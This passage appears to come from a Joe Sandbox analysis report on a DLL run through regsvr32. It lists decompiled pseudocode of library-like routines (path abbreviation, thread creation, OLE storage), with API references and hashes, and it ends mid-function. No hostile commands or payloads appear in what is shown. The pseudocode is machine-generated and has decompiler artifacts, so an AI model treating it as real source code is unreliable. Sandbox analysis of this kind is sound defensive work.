                                                                                                                • API String ID: 672627570-2607584825
                                                                                                                • Opcode ID: 90e863712b9378eaa31c1de6765e72d0314f254249c93e764973403c218e9bde
                                                                                                                • Instruction ID: de33df7f9b91231e11840ea7327c0f422b70cc99c18facc103235999ff5a89ae
                                                                                                                • Opcode Fuzzy Hash: 90e863712b9378eaa31c1de6765e72d0314f254249c93e764973403c218e9bde
                                                                                                                • Instruction Fuzzy Hash: 95519F759002499FEB15DBB4CC95BFEBBF4FF04340F00452DF5A6A6195DA74AA44CB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E100264D2(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t32;
                                                                                                                				void* _t34;
                                                                                                                				intOrPtr _t35;
                                                                                                                				char* _t36;
                                                                                                                				int _t38;
                                                                                                                				CHAR* _t40;
                                                                                                                				CHAR* _t43;
                                                                                                                				void* _t45;
                                                                                                                				void* _t47;
                                                                                                                				void* _t49;
                                                                                                                				intOrPtr _t51;
                                                                                                                				void* _t52;
                                                                                                                				CHAR* _t54;
                                                                                                                				void* _t56;
                                                                                                                				int _t57;
                                                                                                                				intOrPtr _t58;
                                                                                                                				void* _t62;
                                                                                                                
                                                                                                                				_t52 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_push(_t45);
                                                                                                                				_push(_t56);
                                                                                                                				_t54 = _a4;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_t32 = E1002218F(_t54);
                                                                                                                				_t67 = _t32;
                                                                                                                				if(_t32 == 0) {
                                                                                                                					E1000A069(_t45, __ecx, _t54, _t56, _t67);
                                                                                                                				}
                                                                                                                				_t57 = lstrlenA(_t54);
                                                                                                                				_v8 = _t57;
                                                                                                                				_t34 = E10034516(_t54, 0, 0);
                                                                                                                				_t51 = _v8;
                                                                                                                				_t47 = _t34 - 1;
                                                                                                                				_t58 = _t57 - _t47;
                                                                                                                				_t35 = _t58 + _t54;
                                                                                                                				_v12 = _t35;
                                                                                                                				if(_a8 < _t51) {
                                                                                                                					if(_a8 >= _t47) {
                                                                                                                						__eflags =  *_t54 - 0x5c;
                                                                                                                						_t36 =  &(_t54[2]);
                                                                                                                						_a4 = _t36;
                                                                                                                						if( *_t54 == 0x5c) {
                                                                                                                							__eflags = _t54[1] - 0x5c;
                                                                                                                							if(_t54[1] == 0x5c) {
                                                                                                                								while(1) {
                                                                                                                									__eflags =  *_t36 - 0x5c;
                                                                                                                									if( *_t36 == 0x5c) {
                                                                                                                										goto L13;
                                                                                                                									}
                                                                                                                									_t36 = L1004CFCE(_t52, _t54, _a4);
                                                                                                                									_pop(_t51);
                                                                                                                									_a4 = _t36;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L13:
                                                                                                                						__eflags = _t58 - 3;
                                                                                                                						if(_t58 > 3) {
                                                                                                                							do {
                                                                                                                								_t43 = L1004CFCE(_t52, _t54, _a4);
                                                                                                                								__eflags =  *_t43 - 0x5c;
                                                                                                                								_a4 = _t43;
                                                                                                                								_pop(_t51);
                                                                                                                							} while ( *_t43 != 0x5c);
                                                                                                                						}
                                                                                                                						_t58 = _a4 - _t54;
                                                                                                                						__eflags = _a8 - _t58 + _t47 + 5;
                                                                                                                						if(_a8 >= _t58 + _t47 + 5) {
                                                                                                                							_t49 = lstrlenA;
                                                                                                                							while(1) {
                                                                                                                								_t38 = lstrlenA(_a4);
                                                                                                                								__eflags = _t38 + _t58 + 4 - _a8;
                                                                                                                								if(_t38 + _t58 + 4 > _a8) {
                                                                                                                									goto L18;
                                                                                                                								} else {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								do {
                                                                                                                									L18:
                                                                                                                									_t40 = L1004CFCE(_t52, _t54, _a4);
                                                                                                                									__eflags =  *_t40 - 0x5c;
                                                                                                                									_pop(_t51);
                                                                                                                									_a4 = _t40;
                                                                                                                								} while ( *_t40 != 0x5c);
                                                                                                                							}
                                                                                                                							__eflags = _t58;
                                                                                                                							if(_t58 < 0) {
                                                                                                                								L22:
                                                                                                                								_t58 = _a8;
                                                                                                                							} else {
                                                                                                                								__eflags = _t58 - _a8;
                                                                                                                								if(_t58 >= _a8) {
                                                                                                                									goto L22;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t61 = _t58 + _t54;
                                                                                                                							__eflags = _t58 + _t54;
                                                                                                                							_push(E10047757(_t49, _t51, _t58 + _t54, 5, "\\...", 5));
                                                                                                                							L1000135C(_t49, _t51, _t54, _t61);
                                                                                                                							_t35 = E10026487(_t49, _t52, _t54, _t61, _t62, _t54, _v8, _a4);
                                                                                                                						} else {
                                                                                                                							_push(_v12);
                                                                                                                							_push(_v8);
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						if(_a12 != 0) {
                                                                                                                							_push(_t35);
                                                                                                                							_push(_t51);
                                                                                                                							L7:
                                                                                                                							_push(_t54);
                                                                                                                							_t35 = E10019530(_t47, _t52, _t54, _t58, _t62);
                                                                                                                						} else {
                                                                                                                							 *_t54 = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t35;
                                                                                                                			}
                                                                                                                0x100265b7
                                                                                                                0x100265be
                                                                                                                0x100265be
                                                                                                                0x100265b9
                                                                                                                0x100265b9
                                                                                                                0x100265bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100265bc
                                                                                                                0x100265ca
                                                                                                                0x100265ca
                                                                                                                0x100265d2
                                                                                                                0x100265d3
                                                                                                                0x100265df
                                                                                                                0x10026586
                                                                                                                0x10026586
                                                                                                                0x10026589
                                                                                                                0x00000000
                                                                                                                0x10026589
                                                                                                                0x10026520
                                                                                                                0x10026524
                                                                                                                0x1002652e
                                                                                                                0x1002652f
                                                                                                                0x10026530
                                                                                                                0x10026530
                                                                                                                0x10026531
                                                                                                                0x10026526
                                                                                                                0x10026526
                                                                                                                0x10026526
                                                                                                                0x10026524
                                                                                                                0x1002651e
                                                                                                                0x100265eb

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?,?,000000FF), ref: 100264EF
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                  • Part of subcall function 10019530: _strcpy_s.LIBCMT ref: 1001953C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
                                                                                                                • String ID: \...
                                                                                                                • API String ID: 2411880420-1167917071
                                                                                                                • Opcode ID: 425b97c66bdc159ad821b8e1400f97d195f5a1d0c922c3df5298d3a716972ff9
                                                                                                                • Instruction ID: 4e355dd1eabe12f8d297b596017aaa3e0ceaf742dabed09d1a5a97fc94068f4e
                                                                                                                • Opcode Fuzzy Hash: 425b97c66bdc159ad821b8e1400f97d195f5a1d0c922c3df5298d3a716972ff9
                                                                                                                • Instruction Fuzzy Hash: 1E310776800A59FFEF11CF50EC80E9E7BA4EF09390F518126F9045A155E734EE90CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 20%
                                                                                                                			E1004C95A(void* __edx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                                                                                                				DWORD* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t20;
                                                                                                                				DWORD* _t25;
                                                                                                                				intOrPtr* _t27;
                                                                                                                				char _t41;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				_t41 = _a12;
                                                                                                                				_t48 = _t41;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_t41 != 0) {
                                                                                                                					E10051513();
                                                                                                                					_t44 = E1005496F(1, 0x214);
                                                                                                                					__eflags = _t44;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L7:
                                                                                                                						_push(_t44);
                                                                                                                						E100470E9(0, _t41, _t44, __eflags);
                                                                                                                						__eflags = _v8;
                                                                                                                						if(_v8 != 0) {
                                                                                                                							E100490BD(_v8);
                                                                                                                						}
                                                                                                                						_t20 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_push( *((intOrPtr*)(E100516CA(__edx, _t41, __eflags) + 0x6c)));
                                                                                                                						_push(_t44);
                                                                                                                						E10051593(0, _t41, _t44, __eflags);
                                                                                                                						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
                                                                                                                						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
                                                                                                                						_t25 = _a24;
                                                                                                                						__eflags = _t25;
                                                                                                                						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
                                                                                                                						if(_t25 == 0) {
                                                                                                                							_t25 =  &_a12;
                                                                                                                						}
                                                                                                                						_t20 = CreateThread(_a4, _a8, "V3L", _t44, _a20, _t25);
                                                                                                                						__eflags = _t20;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_v8 = GetLastError();
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t27 = E10049097(_t48);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					 *_t27 = 0x16;
                                                                                                                					E10050228(0, __edx, _t41);
                                                                                                                					_t20 = 0;
                                                                                                                				}
                                                                                                                				return _t20;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 1004C989
                                                                                                                • __calloc_crt.LIBCMT ref: 1004C995
                                                                                                                • __initptd.LIBCMT ref: 1004C9AB
                                                                                                                • CreateThread.KERNEL32(?,?,V3L,00000000,?,1001A92A), ref: 1004C9D9
                                                                                                                • GetLastError.KERNEL32(?,74EC13E0,00000000,?,?,1001A92A,?,?,1001A795,?,?,?), ref: 1004C9E3
                                                                                                                • __dosmaperr.LIBCMT ref: 1004C9FB
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                  • Part of subcall function 10050228: __decode_pointer.LIBCMT ref: 10050231
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit__initptd
                                                                                                                • String ID: V3L
                                                                                                                • API String ID: 351847049-3255255363
                                                                                                                • Opcode ID: 748ffce91294342a7963a33e7aed7659759132f52b9a136788063b1aadd5af63
                                                                                                                • Instruction ID: c8a5434d33938f88e35a92148a5fc1000c2d0eb089d5c1984149bf7f72176d94
                                                                                                                • Opcode Fuzzy Hash: 748ffce91294342a7963a33e7aed7659759132f52b9a136788063b1aadd5af63
                                                                                                                • Instruction Fuzzy Hash: F811BC76505209AFDB50EFA4DC86CCEBBE5EF042A8B21043AF541D2091EB31AD108AA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E1002E2C0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t114;
                                                                                                                				intOrPtr _t118;
                                                                                                                				intOrPtr* _t119;
                                                                                                                				void* _t120;
                                                                                                                				intOrPtr* _t121;
                                                                                                                				void* _t122;
                                                                                                                				intOrPtr* _t125;
                                                                                                                				intOrPtr* _t127;
                                                                                                                				void _t129;
                                                                                                                				intOrPtr* _t131;
                                                                                                                				long _t134;
                                                                                                                				void* _t135;
                                                                                                                				void* _t136;
                                                                                                                				void* _t137;
                                                                                                                				void _t139;
                                                                                                                				void _t141;
                                                                                                                				void* _t143;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				void* _t148;
                                                                                                                				void _t149;
                                                                                                                				void* _t151;
                                                                                                                				intOrPtr* _t153;
                                                                                                                				void* _t154;
                                                                                                                				void _t158;
                                                                                                                				void* _t159;
                                                                                                                				void _t161;
                                                                                                                				intOrPtr* _t163;
                                                                                                                				void* _t168;
                                                                                                                				intOrPtr* _t170;
                                                                                                                				intOrPtr* _t172;
                                                                                                                				intOrPtr* _t174;
                                                                                                                				void* _t175;
                                                                                                                				intOrPtr _t184;
                                                                                                                				intOrPtr _t186;
                                                                                                                				intOrPtr* _t206;
                                                                                                                				void* _t210;
                                                                                                                				intOrPtr* _t219;
                                                                                                                				intOrPtr* _t221;
                                                                                                                				void* _t222;
                                                                                                                				void* _t224;
                                                                                                                
                                                                                                                				_push(0x68);
                                                                                                                				_t114 = E1004764D(0x10090312, __ebx, __edi, __esi);
                                                                                                                				_t221 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
                                                                                                                				_t219 = __ecx + 0x50;
                                                                                                                				 *(_t224 - 0x10) = 0;
                                                                                                                				if( *_t219 != 0) {
                                                                                                                					L2:
                                                                                                                					 *(_t224 + 8) = 0;
                                                                                                                					 *(_t224 - 0x14) = 0;
                                                                                                                					 *((intOrPtr*)(_t224 + 0x14)) = 0;
                                                                                                                					E1002C64F(_t221, _t221 + 0x40);
                                                                                                                					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
                                                                                                                					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
                                                                                                                					if(_t118 != 0) {
                                                                                                                						L5:
                                                                                                                						_t222 =  *(_t224 + 0xc);
                                                                                                                						if(_t222 == 0) {
                                                                                                                							__eflags =  *(_t224 + 0x10);
                                                                                                                							if( *(_t224 + 0x10) != 0) {
                                                                                                                								L16:
                                                                                                                								_t119 =  *_t219;
                                                                                                                								_t210 = _t224 - 0x14;
                                                                                                                								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x100a5d5c, _t210);
                                                                                                                								__eflags = _t120;
                                                                                                                								if(_t120 < 0) {
                                                                                                                									L43:
                                                                                                                									if( *(_t224 - 0x10) >= 0) {
                                                                                                                										L47:
                                                                                                                										_t121 =  *((intOrPtr*)(_t224 + 0x14));
                                                                                                                										if(_t121 != 0) {
                                                                                                                											 *((intOrPtr*)( *_t121 + 8))(_t121);
                                                                                                                										}
                                                                                                                										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
                                                                                                                											 *(_t224 - 0x10) = 1;
                                                                                                                										}
                                                                                                                										_t122 =  *(_t224 - 0x10);
                                                                                                                										L53:
                                                                                                                										return E10047725(_t122);
                                                                                                                									}
                                                                                                                									L44:
                                                                                                                									_t125 =  *_t219;
                                                                                                                									if(_t125 != 0) {
                                                                                                                										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
                                                                                                                										_t127 =  *_t219;
                                                                                                                										_t184 =  *_t127;
                                                                                                                										 *((intOrPtr*)(_t184 + 8))(_t127);
                                                                                                                										 *_t219 = 0;
                                                                                                                									}
                                                                                                                									goto L47;
                                                                                                                								}
                                                                                                                								__eflags = _t222;
                                                                                                                								if(_t222 != 0) {
                                                                                                                									__eflags =  *(_t224 + 0x10);
                                                                                                                									if( *(_t224 + 0x10) == 0) {
                                                                                                                										 *(_t224 - 0x10) = 0x8000ffff;
                                                                                                                										L37:
                                                                                                                										_t129 =  *(_t224 - 0x14);
                                                                                                                										L38:
                                                                                                                										 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                                                                                										L39:
                                                                                                                										if( *(_t224 - 0x10) < 0) {
                                                                                                                											goto L44;
                                                                                                                										}
                                                                                                                										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
                                                                                                                											_t186 =  *((intOrPtr*)(_t224 - 0x24));
                                                                                                                											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
                                                                                                                												_t131 =  *_t219;
                                                                                                                												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L43;
                                                                                                                									}
                                                                                                                									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
                                                                                                                									__eflags = _t210;
                                                                                                                									 *(_t224 - 0x2c) = _t134;
                                                                                                                									if(__eflags > 0) {
                                                                                                                										L29:
                                                                                                                										 *(_t224 - 0x10) = 0x8007000e;
                                                                                                                										 *(_t224 + 0x10) = 0;
                                                                                                                										L30:
                                                                                                                										__eflags =  *(_t224 + 0x10);
                                                                                                                										 *(_t224 - 0x1c) = 0;
                                                                                                                										if( *(_t224 + 0x10) == 0) {
                                                                                                                											goto L37;
                                                                                                                										}
                                                                                                                										_t135 = _t224 - 0x1c;
                                                                                                                										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
                                                                                                                										__eflags = _t135;
                                                                                                                										 *(_t224 - 0x10) = _t135;
                                                                                                                										if(_t135 < 0) {
                                                                                                                											goto L37;
                                                                                                                										}
                                                                                                                										_t136 = _t224 - 0x18;
                                                                                                                										 *(_t224 - 0x18) = 0;
                                                                                                                										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
                                                                                                                										__eflags = _t136;
                                                                                                                										 *(_t224 - 0x10) = _t136;
                                                                                                                										if(_t136 >= 0) {
                                                                                                                											_t139 =  *(_t224 - 0x14);
                                                                                                                											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
                                                                                                                											_t141 =  *(_t224 - 0x18);
                                                                                                                											 *((intOrPtr*)( *_t141 + 8))(_t141);
                                                                                                                										}
                                                                                                                										_t137 =  *(_t224 - 0x1c);
                                                                                                                										L35:
                                                                                                                										 *((intOrPtr*)( *_t137 + 8))(_t137);
                                                                                                                										goto L37;
                                                                                                                									}
                                                                                                                									if(__eflags < 0) {
                                                                                                                										L26:
                                                                                                                										_t143 = GlobalAlloc(0, _t134);
                                                                                                                										__eflags = _t143;
                                                                                                                										 *(_t224 + 0x10) = _t143;
                                                                                                                										if(_t143 == 0) {
                                                                                                                											goto L29;
                                                                                                                										}
                                                                                                                										_t144 = GlobalLock(_t143);
                                                                                                                										__eflags = _t144;
                                                                                                                										if(_t144 == 0) {
                                                                                                                											goto L29;
                                                                                                                										}
                                                                                                                										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
                                                                                                                										GlobalUnlock( *(_t224 + 0x10));
                                                                                                                										goto L30;
                                                                                                                									}
                                                                                                                									__eflags = _t134 - 0xffffffff;
                                                                                                                									if(_t134 >= 0xffffffff) {
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                								_t147 = _t224 + 0xc;
                                                                                                                								 *(_t224 + 0xc) = 0;
                                                                                                                								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
                                                                                                                								__eflags = _t147;
                                                                                                                								 *(_t224 - 0x10) = _t147;
                                                                                                                								if(_t147 < 0) {
                                                                                                                									goto L37;
                                                                                                                								}
                                                                                                                								_t148 = _t224 + 0x10;
                                                                                                                								 *(_t224 + 0x10) = 0;
                                                                                                                								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
                                                                                                                								__eflags = _t148;
                                                                                                                								 *(_t224 - 0x10) = _t148;
                                                                                                                								if(_t148 >= 0) {
                                                                                                                									_t149 =  *(_t224 - 0x14);
                                                                                                                									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
                                                                                                                									_t151 =  *(_t224 + 0x10);
                                                                                                                									 *((intOrPtr*)( *_t151 + 8))(_t151);
                                                                                                                								}
                                                                                                                								_t137 =  *(_t224 + 0xc);
                                                                                                                								goto L35;
                                                                                                                							}
                                                                                                                							L11:
                                                                                                                							_t153 =  *_t219;
                                                                                                                							_t213 = _t224 + 8;
                                                                                                                							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x100a604c, _t224 + 8);
                                                                                                                							__eflags = _t154;
                                                                                                                							if(_t154 < 0) {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							__eflags = _t222;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								L10022E9A(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
                                                                                                                								 *(_t224 - 4) = 0;
                                                                                                                								E10021EF1(_t224 - 0x2c, _t224 - 0x74);
                                                                                                                								_t158 =  *(_t224 + 8);
                                                                                                                								_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
                                                                                                                								_t47 = _t224 - 4;
                                                                                                                								 *_t47 =  *(_t224 - 4) | 0xffffffff;
                                                                                                                								__eflags =  *_t47;
                                                                                                                								 *(_t224 - 0x10) = _t159;
                                                                                                                								L10022DDA(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
                                                                                                                							} else {
                                                                                                                								_t161 =  *(_t224 + 8);
                                                                                                                								 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
                                                                                                                							}
                                                                                                                							_t129 =  *(_t224 + 8);
                                                                                                                							goto L38;
                                                                                                                						}
                                                                                                                						if( *(_t224 + 0x10) != 0) {
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						_t163 =  *_t219;
                                                                                                                						_push(_t224 + 0x14);
                                                                                                                						_push(0x100a605c);
                                                                                                                						_push(_t163);
                                                                                                                						if( *((intOrPtr*)( *_t163))() < 0) {
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push(3);
                                                                                                                						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
                                                                                                                							goto L11;
                                                                                                                						} else {
                                                                                                                							 *(_t224 + 0x10) = 0;
                                                                                                                							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
                                                                                                                							_t206 =  *((intOrPtr*)(_t224 + 0x14));
                                                                                                                							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
                                                                                                                							_t170 =  *((intOrPtr*)(_t224 + 0x14));
                                                                                                                							 *((intOrPtr*)( *_t170 + 8))(_t170);
                                                                                                                							 *((intOrPtr*)(_t224 + 0x14)) = 0;
                                                                                                                							goto L39;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t172 =  *_t219;
                                                                                                                					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
                                                                                                                					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					_t174 =  *_t219;
                                                                                                                					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
                                                                                                                					 *(_t224 - 0x10) = _t175;
                                                                                                                					if(_t175 < 0) {
                                                                                                                						goto L44;
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				_t122 = E1002C456(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x100a48ac, _t219,  *((intOrPtr*)(_t224 + 0x14)));
                                                                                                                				 *(_t224 - 0x10) = _t122;
                                                                                                                				if(_t122 < 0) {
                                                                                                                					goto L53;
                                                                                                                				}
                                                                                                                				goto L2;
                                                                                                                			}













































                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002E2C7
                                                                                                                  • Part of subcall function 1002C456: SysStringLen.OLEAUT32(?), ref: 1002C45E
                                                                                                                  • Part of subcall function 1002C456: CoGetClassObject.OLE32(?,?,00000000,100A592C,?), ref: 1002C47C
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1002E451
                                                                                                                • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1002E472
                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1002E4BF
                                                                                                                • GlobalLock.KERNEL32 ref: 1002E4CD
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1002E4E5
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 1002E508
                                                                                                                • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1002E524
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 317715441-0
                                                                                                                • Opcode ID: 8c7d488902b9e1a39518e68f9d93eed89a4edd8462c3009efc4f67080f8eaa64
                                                                                                                • Instruction ID: 46ea3d0135d633fa669698b565d5f04e2964583978d89af6c37444e9be5ad38e
                                                                                                                • Opcode Fuzzy Hash: 8c7d488902b9e1a39518e68f9d93eed89a4edd8462c3009efc4f67080f8eaa64
                                                                                                                • Instruction Fuzzy Hash: AAC128B094025ADFCB10DFA4D8889AEBBB9FF48344B904969F916EB251D771DD40CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1000DDD6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t122;
                                                                                                                				intOrPtr _t130;
